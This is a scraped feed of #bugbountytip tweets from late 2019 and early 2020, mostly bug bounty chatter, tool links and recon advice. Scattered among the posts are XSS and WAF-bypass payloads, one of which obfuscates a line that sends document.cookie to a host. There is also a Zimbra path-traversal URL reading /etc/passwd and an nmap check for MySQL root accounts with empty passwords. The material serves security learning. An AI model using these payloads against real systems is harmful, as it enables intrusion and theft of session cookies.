1 XSS waf bypass challenge... Please share your favorite xss payload for waf bypass... My favorite : ">'><details/open/ontoggle=confirm('XSS')> #bugbountytip #bugbountytips #hackingcommunity
James Nunes
@jamesgnunes


2020-01-04 13:39:08
0 So, @Xiaomi says it has fixed Mi Home Security Camera bug that displayed pictures from other cameras on Google Nest hub. https://t.co/6b5btrAPnk #Xiaomi #Google #bugbountytip #bughead #tech #TechNews #technology #blog #blogger #WordPress
Evan Custodio
@defparam


2020-01-04 00:13:12
0 An HTTP Request Smuggling CL.TE bug lets you redirect a victim connection to a forged endpoint with GET parameters. FYI you can execute a forged graphql query this way on the victim by using: GET /graphql?query=<query> #bugbountytip
m0z
@LooseSecurity


2020-01-03 19:48:43
7 A cool list by @vaib25vicky which indexes useful resources for educating yourself about mobile security! It's a cool area to get into with lots of #bugbounties to be found. https://t.co/AZpQyQNwUN #BugBounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2020-01-03 19:46:57
0 Awesome tool to get your target initial recon! #infosec #bugbountytip https://t.co/ysJXq6Yi4t
Bala Elangovãn
@balaelangovan03


2020-01-03 18:47:40
1 My first blog about "How to get started in bug bounty? (Newbie's Perspective)". https://t.co/jHSoKDM7Yo #bugbountytips #bugbountytip #bugbounty
Ammar Amer
@cry__pto


2020-01-03 18:30:16
8 Practice part (2): https://t.co/X281shcjyP https://t.co/spNrTQFgSb https://t.co/vHcoFvviU4 https://t.co/sezBbjXqqh https://t.co/lN4dzsQzSK https://t.co/M9acV7uh2L https://t.co/3wpLokyrgW https://t.co/A1qXCSlOA3 https://t.co/XiR5giK6K9 #BugBounty #bugbountytip #hacking #pentest
noobSecurity
@noobsec_org


2020-01-03 02:00:45
5 P1 on new year (zimbra LFI) [https://t.co/Ab4o1tOu0o]/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 #bugbounty #togetherwehitharder #bugbountytips #bugbountytip https://t.co/NH7meUlaH0
m0z
@LooseSecurity


2020-01-02 20:30:41
1 We are almost at 1,000 members in the League of Bounties discord server! Thanks to all the members who always make it a great chat. :) https://t.co/tVOlrpA4KP #bugbountytips #BugBounty2020Goals #bugbountytip
Arshad Aman
@MeArshadaman


2020-01-02 14:57:03
0 When You Go to HackerOne and see Bounty of $20000 but already claimed by someone else, Then #hacking #cybersecurity #BugBounty2020Goals #bugbountytip @Hacker0x01 @Bugcrowd https://t.co/M6xq9TArVj
Selim Enes Karaduman
@Enesdex


2020-01-02 00:02:45
1 Are all subdomains of https://t.co/UJzSqq2q8o in scope or just https://t.co/I6tTfy4Xfw? I found a bug on a subdomain of spotify but I'm confused about whether it's in scope or not #BugBounty #bugbountytips #bugbountytip #hackerone @Spotify @Hacker0x01 @alicanact60 https://t.co/44Xo60yvM9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 16:23:31
0 #Protip: If a website uses your photo and crops them into the avatar, there may be a good chance that the website is using ImageMagick to do that. Follow Us 💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
Elsadat ✪
@M0_SADAT


2020-01-01 14:53:06
0 Yaaay, what a great start of 2020!!! Just discovered my 2nd SQL injection on private program @Bugcrowd ! I guess I’m the 1st hacker found P1 on 2020🔥 Happy new year https://t.co/rYxy7EDxzk you made my day😂 #bugbountytip SQLI still alive! #bugbounty #HappyNew2020 #hacking https://t.co/G1GJuet3A4
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 12:11:47
3 That's When We Decided To Become BUG HUNTERS ! ❤️💰💰💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/Ki3Tvkbeia
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 08:45:22
0 Happy New Year Hackers and Bug Bounty Hunters ! Have an Awesome Year with lots of Bounties and $$ Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting https://t.co/7t7Lm5yn0r
drivertom
@drivertomtt


2020-01-01 01:50:28
2 Just curious about whether twitter bots click Like merely by hashtag #malware #APT #cybersecurity #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:50:41
1 Here are 2 tools which are useful for scraping subdomains/directories in javascript files. https://t.co/VCZ4tzZamU by @jobertabma https://t.co/b0NRR2ub2w by the best hacker in the world #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:45:48
3 I'm still hosting 2 #XSS challenges on my challenge site! https://t.co/cNYQsW7qVi Both were inspired by real bounties I have found! If you haven't already tried your hand at them, it's well worth a go. #bugbounty #bugbountytip #bugbountytips #infosec
Ammar Amer
@cry__pto


2019-12-31 19:40:35
4 #bugbounty tools part (1): tko-subs:https://t.co/Tawtj1NvWc truffleHog:https://t.co/B3OeZDOdH0 subfinder:https://t.co/QqNOKFuHk1 sslScrape:https://t.co/448jbQ2nbw Gobuster:https://t.co/NI2PnTIFdy SecLists:https://t.co/QPSqeXvWix EyeWitness:https://t.co/461kpUL5CA #bugbountytip
Khaled
@Khaled95677506


2019-12-30 17:34:29
0 My 1st RCE😎 With my bro Osama Alaa. Don't forget to test PHP-CGI, it may give you RCE #bugbountytips #BugBounty #bugbountytip https://t.co/iyLami2sWr
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-30 17:32:47
0 StrandHogg Bug - Unpatched Android OS Vulnerability #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/8Cr6ShD9jf
Nick || hunt4p1zza
@ngkogkos


2019-12-30 16:58:55
0 Need target specific folders list for fuzzing based on robots.txt? Use @TomNomNom's meg tool: 1. meg -c 200 path.txt urls.txt meg_robots 2. cat meg_robots/index | grep "200 OK" | awk '{print $1}'| xargs cat | grep "Disallow:" | awk '{print $2}' | sort -u #bugbountytip #bugbounty
bug bounty tips - Retweet
@BugbountytipsR


2019-12-30 13:22:23
2 CAN YOU EARN $15000 BY CLICKJACKING? Raushan Raj ========== ^This man did [Tag him if you know his twitter handle] #bugbountytips #bugbountytip WriteuP https://t.co/QhE7nmsJEB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-30 12:21:45
6 ✈️Use Telegram bot as a Penetration Testing Framework 🏆🏆🎖🎖💰💰 Follow this page and learn Bug Bounty Tips and Tricks https://t.co/27kPwhJVdt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone
Larouanne Tristan
@Tr4LSecurity


2019-12-30 10:47:25
0 Doing some #pentesting in a company using #maven ? Look for xml file in the user .m2 folder. This contains password easily decryptable https://t.co/dg9nBqjWoT #infosec #hacking #pentest #CyberSecurity #bugbountytips #bugbountytip #java
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-30 10:34:05
0 #burp #bugbountytips #bugbountytip RCE with Burp Suite intruder + Regex https://t.co/JmpAvEfNr3 via @YouTube
Men up
@uppmen


2019-12-30 00:42:39
0 How did I earn $3133.70 from Google Translator? @Google @TranslateTricks #BugBounty #bugbountytip #BugBounty2020Goals 😆 https://t.co/nVwersBz1n
Dr.FarFar ⓲
@3XS0


2019-12-29 20:53:47
0 Old #bugbountytip from 5 years ago! https://t.co/4o2f9Wgs7A …
ghostlulz
@ghostlulz1337


2019-12-29 19:52:43
13 Source Code Analysis SQLI: https://t.co/m5K3yzo6iU Source Code Analysis XSS: https://t.co/Ke274Lvc9e Source Code Analysis Race Condition: https://t.co/jycSCNE9ms Bug Bounty Book - https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #redteam #infosec #xss #dfir https://t.co/vP7FxiOTGH
Nick || hunt4p1zza
@ngkogkos


2019-12-29 18:22:20
0 If you are not using @hacker_'s getallurls Go tool when doing #recon & #bugbounty you are missing out on interesting URLs/endpoints as it fetches from 3 sources: AlienVault/Wayback Machine/Common Crawl. Before using check you are not IP blocked from these. #bugbountytip https://t.co/rj0EjuXs1t
Sahil Ahamad
@ehsahil


2019-12-29 16:11:02
11 Time for #bugbountytip - always look for 3 types of employee in a company from Linkedin or other sources. 1. DevOps/SRE 2. Data Science 3. Tech Interns It will help a lot from your recon perspective and you will be amazed to see the results. #bugbountytips #HappyHacking
ghostlulz
@ghostlulz1337


2019-12-29 15:56:37
5 Clickjacking is an easy $100 - $500 vulnerability. Super easy to find and often forgotten by developers and hunters alike. Easy wins all day. More info on my blog: https://t.co/kcOYSJcbUG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #redteam #dfir https://t.co/4zPbulEHqC
Andy Garcia
@GaelleTjat


2019-12-29 15:49:12
2 For sure horizontal moves require some form knowledge of the vertical ones. Referring to the Cors Lab 3 where you need to know/read XSS in order to solve the lab 🤦🏾‍♀️🤦🏾‍♀️🤦🏾‍♀️ #BugBounty #bugbountytip #BugBounty2020Goals
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-29 15:18:24
0 If you spend most of your time in low speed internet connection like me i.e > 100KB/sec just use Google cloud shell which is free or just use a cheap vps providers like digital ocean :) #bugbountytip https://t.co/CvazXZy8p1
bug bounty tips - Retweet
@BugbountytipsR


2019-12-29 03:45:01
0 "The more you talk, the more they REVEAL" TIP : Check The Server Response Carefully x 3 Tool TIPs: You can modify response by burp [FACEBOOK HACKED] by EVIL BOY AJAY @evilboyajay wRITEUp https://t.co/26eGroHHNu #bugbountytip #bugbountytips
🧠🏴‍☠️Borbolla
@renatoborbolla


2019-12-29 03:29:38
0 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #Pentesting
Pentester /KökBüre
@GokBoruEfe


2019-12-28 23:40:34
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
plenum 🇹🇳
@plenumlab


2019-12-28 20:52:16
0 There are only two kinds of infosec folks: - Those who say P.O.C - Those who say POC as POK There you have it now you know. #bugbountytips #bugbountytip
Antonio
@HerrJoost


2019-12-28 20:25:31
2 Best budget notebook focused on programming /#bugbounty? #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-28 16:17:21
7 Cross-Origin Resource Sharing (CORS) can be used to bypass the Same Origin Policy(SOP) and read sensitive user data if implemented improperly. Easy wins all day. Learn more on my blog: https://t.co/ZdNpP9a3hy #BugBounty #bugbountytip #bugbountytips #infosec #appsec #osint #cors https://t.co/hR0qm2YeGc
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-28 14:58:50
0 #bugbountytips #bugbountytip #Brutelogic #knoxss Thank @rodoassis for this test page. When you love xss and try do it in your phone browser: Android mozilla https://t.co/sRV8TzIgIP
ghostlulz
@ghostlulz1337


2019-12-28 13:31:41
30 If you're looking to make a living doing bug bounties or penetration testing you may want to get a copy of my book: https://t.co/zJFRZjg5q2 #bugbounty #xss #osint #redteam #bugbountytips #bugbountytip #infosec https://t.co/fVT4hqpfpi
Ashish Kunwar
@D0rkerDevil


2019-12-28 12:50:58
1 #bugbountytip Do ASN lookups and do an nmap scan on CIDR range[s], and you might end up with juicy services like rpcbind, snmp etc. or panels having default creds.
Nouroz Gaming
@NourozGaming


2019-12-28 10:01:10
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 08:15:48
9 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 07:58:17
17 Reverse Shell Cheat Sheet TooL: https://t.co/ROjGR5MCTl #bugbountytip #hacking #pentest https://t.co/00p6QbX7sO
Ammar Amer
@cry__pto


2019-12-28 07:53:24
7 JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool: https://t.co/EMKunAzMS5 #bugbountytip #hacking #pentest
m0z
@LooseSecurity


2019-12-28 00:51:41
0 A nice find by @s3c_krd which is definitely worth checking out: https://t.co/JRj3kv0zDI CRLF Injection is kinda rare to come by these days, and this was a cool PoC on Twitter. :) #bugbounty #bugbountytip #bugbountytips
Th3Alch3mist~
@Debian_Hunter


2019-12-27 17:06:41
2 Found this in a write-up and this is cool ....have a look XSSI:- https://t.co/s6baugCH6l JSONP:- https://t.co/BNkRFlwTnN #bugbountytips #bugbounty #bughunting #bugbountytip https://t.co/9SXzd4t9Kw
Tinu rockk
@TinuRock007


2019-12-27 15:41:10
0 finally secure @sony 2019 arrived as xmas gift :) #swag #bugbountytips #bugbountytip #cybersecurity #sony #hackerone #togetherwehitharder https://t.co/77H3eJ2uV9
Mashoud1122
@mashoud1122


2019-12-27 09:28:34
2 Did my 1st collab with @OriginalSicksec and @Skeletorkeys We got an amazing XSS on https://t.co/mVGZMsShQL WAF Bypass used: document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') + btoa(document.cookie) + '>') #bugbountytips #bugbountytip #BugBounty https://t.co/xkL6Dr47ed
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-27 06:40:48
0 Hey @NahamSec just so you know people in India pronounce your name as "Ben shani-singhnapur" ! 🙃 #bugbounty #bughunter #bugbountytips #bugbountytip
cor3_cls
@cor3_cls


2019-12-26 20:01:06
3 @enigmaticsoulrg @zPrototype2 @gobias_infosec paid: @PentesterLab. Free: @hacker0x01 Hacker101 site and CTF. @Bugcrowd levelup and university <3 (youtube & git), and the best for me is @PortSwigger @WebSecAcademy Also #bugbountytip hashtag and @intigriti tips are very informative.
Karna
@karna__1


2019-12-26 17:56:24
0 To all those who want to know 'How do I get started with Bug Bounties?', go through the threads! #bugbounty #bugbountytips #infosec #bugbountytip #gettingstarted https://t.co/kgXdWqIHJ2
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-26 13:09:29
5 Port scanning can be seen as, or construed as, a crime. We should never execute a port scanner against any website or IP address without explicit, written permission from the owner of the server or computer that you're targeting #infosecurity #infosec #cybersecurity #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-26 10:29:34
2 Check out my new blog about Bypassing Brand Collabs Manager Eligibility. #bugbountytip #bugbounty #cybersecurity https://t.co/VpLI1UNVz6
Nassec.io
@nassecio


2019-12-26 10:26:23
3 @evilboyajay has a new write up for the bug bounty community. Check out our weekly blog about Brand Collabs Manager bypass on Facebook. #infosec #infosecmatters #hacking #bugbounty #bugbountytip https://t.co/4TDqHCMUso
Andy InfoSec
@AndyInfoSec_


2019-12-26 07:22:01
0 Part 3: Resources about #GraphQL #bugbounty Facebook GraphQL CSRF: https://t.co/7LnN4yo1Zp Tools : https://t.co/I52mNTERIN https://t.co/MHIuNuvaHC https://t.co/qlCtI5KJMI https://t.co/LPOkb9LtSj #cybersecurity #bugbountytip #bug #bounty #vapt #andyinfosec
Texy45
@RegisDeldicque


2019-12-26 06:06:42
0 @yeswehack @intigriti #bugbountytips #bugbountytip Tips : if your target forward http to https urls, try to add %0a char at the end of http urls. You could probably find out juicy paths.
Asad Anwar
@AsadAnw90


2019-12-25 23:25:13
0 Always look at the "view-source" page; sometimes the HTML page contains a secret key. #bugbountytip #bugbounty https://t.co/VxzIgzVd06
Cryptographer
@crypt0gr4ph3r


2019-12-25 16:50:02
0 #bugbountytip When token says invalid on password change when unauthorisation. Try to use the same invalid token when authorisation. Low severity account takeover, awarded $200 bounty #hackerone #bugbounty #hacker101
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-25 07:22:52
0 OWASP Events Calendar - Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #eccouncil #owasp #hackerone https://t.co/q2BFcxrK65
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-25 07:14:39
3 Windows Process Hacking Library Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #FolloMe https://t.co/t6TtdwgfQm
Sayaan Alam
@ehsayaan


2019-12-25 06:01:11
0 Finally Done with LazyRecon Set-Up on Ubuntu VM , Thanks to @NahamSec For this great script.. #bugbountytip #bugbounty https://t.co/XLxtx3FAKS
warbid
@id_warb


2019-12-25 02:02:44
0 Why does everyone talk about PDO if it doesn't work? Yet another case IRL. #bugbountytip https://t.co/efz78UQSd6
bug bounty tips - Retweet
@BugbountytipsR


2019-12-24 16:22:32
0 WEB CACHE POSITIONING HOST HEADER INJECTION by James Kettle @albinowax #bugbountytip #bugbountytips #bugbounty https://t.co/Lau7339zXG
Jinone
@jinonehk


2019-12-24 07:47:07
1 New Write-up About a dom xss From a private project 500$ https://t.co/oa4JnqhtwB Merry Christmas to you all ! Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-12-24 07:40:18
3 Finding root accounts with an empty password in MySQL servers: nmap -p3306 --script mysql-empty-password xx.xx.xx.xx #Hacking #bugbountytip #Pentesting
Sayaan Alam
@ehsayaan


2019-12-24 02:32:45
0 Yay!!! Another 10k Awarded From TataCliq For Multiple Rate Limiting Issues!!! Great BB Program.. 2 More Triaged.. #bugbounty #bugbountytip #togetherwehitharder
Ricardo Freitas
@0x61737078


2019-12-24 02:11:26
0 RT @andripwn: RT @pwn0sec: Web cache poisoning attack https://t.co/6f6dxXBZTL #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Ash
@m0rph1n3e


2019-12-23 23:15:55
0 is it possible to bypass the file extension in Local File Inclusion? URL Example: https://blahblahblah/?language=english which reads from english.html ( only html files ) #bugbounty #bugbountytip #bugbountytips #hacker0x01 #LFI
Security Executions Code
@pwn0sec


2019-12-23 20:58:18
0 File Path Traversal Using Burp-suite (Intruder) https://t.co/CmPakEgzfB #bugbountytip #bugbountytips #path_traversal #burpsuite #intruder
ghostlulz
@ghostlulz1337


2019-12-23 17:03:56
9 A Race Condition allowed one person to steal over $1,000,000 dollars from an ATM. If you're curious how to detect these types of flaws check out my blog: https://t.co/jycSCNE9ms #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #xss #pentest #appsec #DFIR https://t.co/DxXsgzyZ0Z
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-23 11:05:40
2 Top #pentesting and Bug Bounty Burp Extensions https://t.co/naoLUFqmPu #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-23 11:03:19
4 Hardware Hacker Bee #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops https://t.co/KHAvODLYHa
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-22 21:40:06
1 #bugboutytips, #bugbountytip, #burp Detect file path traversal by Burp Suite intruder + regex https://t.co/T1xb4tCsLV via @YouTube
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-22 21:37:21
2 #bugbountytip, #bugbountytips, #burp, #xss Easy way detect easy reflect XSS. Easy Reflect XSS Burp Intruder https://t.co/oYRVhwD1VA via @YouTube
Ammar Amer🇸🇾
@cry__pto


2019-12-22 16:49:04
0 Pentesting-Bible #hacking #pentest #redteam #OSINT #malware #CyberSecurity #ctf #bugbountytip it is just the beginning!👍😎 https://t.co/MmUnOQkJ7a
Andy Garcia
@GaelleTjat


2019-12-22 16:48:33
0 Great reading. #Infosec #Infosectips #bugbountytip https://t.co/NmloxT9KE3
Sunil
@Sunilkande1137


2019-12-22 14:33:19
0 Vimeo upload function SSRF by @dPhoeniixx https://t.co/DMIZfZoHJA #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #ssrf #hacking
ईशान सिंह
@R0X4R


2019-12-22 13:23:57
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/98c2ORAMwW
Karna
@karna__1


2019-12-22 13:08:46
0 Converted IP formats can be used to bypass blacklisted IP addresses while trying SSRFs. You just need to do 3 steps and you can convert formats at any time using your terminal. Happy Hunting! #bugbountytip #bugbountytips #infosec #AUTOMATION (2/2)
Ammar Amer🇸🇾
@cry__pto


2019-12-22 08:56:42
1 -1-2000 articles as pdf files & 2000 links to advanced articles and resources about different fields of ethical hacking and programming -2-114 detailed osint tips: -how to gather info & why -useful tools https://t.co/xGKKQoPyyq #bugbountytip #Hacking #OSINT #Pentesting #redteam
Brodie Codie ™
@brodie_codie


2019-12-22 07:31:56
0 Not a bad week, submitted 5 Cross-site scripting (XSS) vulnerability Reports... now the waiting game begins <a onmouseover="alert(document.cookie)">xxs link</a> "><img src=x onerror=alert(domain)> #bugbountytips #bugbountytip
ईशान सिंह
@R0X4R


2019-12-22 04:58:41
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/9vrKqD7lnY
Hendrik
@hendrikvb


2019-12-21 21:00:28
0 Obviously whatweb (@urbanadventur3r) will provide interesting results too! #bugbountytip https://t.co/z1uuPGsmcZ
ghostlulz
@ghostlulz1337


2019-12-21 13:04:48
4 🎅 MERRY CHRISTMAS 🎅 If you're looking for a good read over the holiday you should check out my Bug Bounty Book. Instead of spending money you could be making money💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #osint #xss #appsec #dfir #redteam #hackers https://t.co/wWp4w7lmFM
drivertom
@drivertomtt


2019-12-21 12:13:30
0 How to defeat webshell scanners #bugbountytips #bugbountytip https://t.co/A79IMJYhtk
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:46:45
0 @iagox86 Tools - Padbuster Poracle Ciphers - CAST-cbc aes-128-cbc aes-192-cbc aes-256-cbc bf-cbc camellia-128-cbc camellia-192-cbc camellia-256-cbc cast-cbc cast5-cbc des-cbc des-ede-cbc des-ede3-cbc desx-cbc rc2-40-cbc rc2-64-cbc rc2-cbc seed-cbc #bugbountytip #bugbountytips 2/2
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:42:02
0 DECRYPT CIPHER WITHOUT THE KEY Padding Oracle Attack in Detail by Ron Bowes @iagox86 Explanation https://t.co/KWuU3SruSj An Example https://t.co/u0DcQnqa0o Encrypt data https://t.co/NnH2sXuoXT Practice https://t.co/xtgWVCO63p #Pastebin #bugbountytip #bugbountytips (1/2)
ghostlulz
@ghostlulz1337


2019-12-21 02:32:20
8 Wayback SQL Scanner - https://t.co/IcaV2mPjQV Swagger API - https://t.co/5toTZrRmdz New Robots.txt - https://t.co/IsyaPyECWG CSV Injection - https://t.co/loAf6mRXft XXE - https://t.co/vhpq7Bjg4d #BugBounty #bugbountytips #bugbountytip #infosec #osint #xss #appsec #hacking https://t.co/DGkhLNFata
Tarek Mohammed
@Conan0x3


2019-12-20 21:05:46
0 - Get a slack notification from "Monitorizer" about new sub-domains for a target - Found sub-domain for splunk enterprise - Search exploits for current version - Found CVE allow to disclose the server info along with product license key :D #bugbountytip #BugBounty https://t.co/fULk1BZbwP
Inon Shkedy
@InonShkedy


2019-12-20 01:50:06
2 Pentest for APIs? Leverage the predictable nature of REST APIs to find admin API endpoints! For example, if you saw the following API call: GET /api/v1/users/<id> Give it a chance, and change to DELETE / POST to create / delete users. #bugbountytip #bugbounty
Jesse Clark
@Hogarth45_ND


2019-12-19 23:12:22
1 On @Hacker0x01 use the Scope Version page to ensure you are seeing the entire scope for a program. Sometimes you can find several domains listed that are not reflected on the regular policy page. #bugbountytip https://t.co/9aHu40ON8I
Kenan
@h1_kenan


2019-12-19 21:59:09
0 It is time! https://t.co/oVgbVlEwQj #XSS #hacking #security #bugbountytip Please RT if you like. thanks
Yadhavi
@PrincessYadhavi


2019-12-19 18:44:19
2 "$HOME/bugbounty/platform(ht,bugcrowd,etc)/program(verizonmedia)/target(yahoo)/target(com)(if scope has multiple TLDs)/date(dec-20)/tool(masscan)/filename (with toolname to easily identify)(yahoo.com-masscan.txt)" #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2019-12-19 18:39:53
0 Use same directory structure on all of your systems.(windows, kali vm, vps). It'll save a lot of time. my directory structure for masscan on yahoo: "$HOME/bugbounty/h1/verzionmedia/yahoo/com/dec-20/masscan/yahoo.com-masscan.txt" #bugbountytips #bugbounty #bugbountytip
Apoorv Raj Saxena
@secxena


2019-12-19 16:02:04
1 I just published CredCheck — A credential Pentesting framework #bugbountytool #bugbounty #bugbountytip #Section144 https://t.co/zVlMCiIhpN
ak1t4 🇦🇷
@akita_zen


2019-12-19 15:52:43
1 #bugbountytip: The Program always has the last word, Not the Triaging Analyst. Keep pushing until program security team ping you with a "clear" feedback. *Most of triagers/analyst prioritizes customers than bugbounty hunters , even when your report is valid. #bugbounty #infosec
Sebastian Wieseler
@kickino


2019-12-19 14:13:45
0 Second subdomain takeover within a few days. 🥳🥳 The bugs are all around. They’re just waiting for you to find them 😁😁 #bugbounty #bugbountytip #togetherwehitharder
Sanketh Sharath
@sharathsanketh


2019-12-19 13:38:04
3 After 6 months of bug hunting, i have taken a step back to pause and go back to reading and training (labs) this month. On reading again, I realised I didn't know shit about shit. Learning never ends. I really recommend newbies do this! #bugbounty #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2019-12-19 11:56:28
0 Parameter Pollution #bugbountytips #bugbountytip #bugbounty https://t.co/UolTrcx2q8
Fisher
@Regala_


2019-12-19 09:13:28
0 Actually, here's my top tip for writing a good report: you should be able to follow and reproduce the steps on YOUR own report after some time has passed #bugbounty #bugbountytip
d0nut
@d0nutptr


2019-12-19 01:03:37
0 @John08369305 @uraniumhacker @intigriti You might say “then teach them!” Which I have more than most... but even the people I’ve spent hours on don’t seem to “get it”. Then they go around bringing others down with their misunderstandings. Just look at #bugbountytip . Like half of these are garbage.
mohsin khan
@mohsink83789226


2019-12-18 16:57:34
0 Please share web pentesting resources with me #bug #bugbountytips #bugbountytip #hacking #Hacker #bountyhunter #bounty
Rafin Rahman Chy
@rafinrahmanchy


2019-12-18 14:06:23
6 Required Skills for Facebook Bug Bounty *Web App Pentesting *Facebook API *graphQL *Burp Suite *Studying PoCs #BugBounty #bugbountytip #bugbountytips #EthicalHacker #EthicalHacking #Hacking #Hacker #Hackers #InfoSec #Infosecurity #ITsecurity #ITSec #netsec #appsec #websecurity https://t.co/AprGSWj64P
0x8hany
@Haniawad


2019-12-18 02:25:10
5 As @zseano always saying lazy developer reuse the code :) #BugBounty #bugbountytip https://t.co/NKfPRcd5f0
ghostlulz
@ghostlulz1337


2019-12-17 21:27:13
7 SQL injection is one of the most popular vulnerabilities out there yet there seems to be a lack of people who can identify this flaw in an application's source code. More info on my blog: https://t.co/m5K3yzo6iU #BugBounty #bugbountytip #bugbountytips #infosec #xss #sqli #osint https://t.co/BeKWOSmNpY
Fisher
@Regala_


2019-12-17 15:31:24
2 Flexing of the day 😇 (impact took a beating) If you need help/tips -> reply below with SPECIFIC questions other than where to start, how to get crit, etc #bugbountytip https://t.co/GGpecf900H
Dhamu
@Dhamu_offi


2019-12-17 10:44:05
1 #bugbountytip #bugbounty Abusing feature to steal your tokens https://t.co/jN2AvQDQ7i
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 10:20:33
2 Best guideline to become a Web Application Security Researcher in my opinion https://t.co/uVslvJiX80 #EthicalHacking #EthicalHacker #Hacking #Hacker #WebSecurity #BugBounty #bugbountytip #bugbountytips #netsec #AppSec #InfoSec #ITsecurity #CyberSecurity #Pentesting #pentest
Dhamu
@Dhamu_offi


2019-12-17 10:17:30
7 #bugbountytip #bugbounty Hacking GitHub with Unicode's dotless 'I'. #Vulnerability: Password reset emails delıvered to the wrong address. https://t.co/VKRlN2AxdH
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 09:33:35
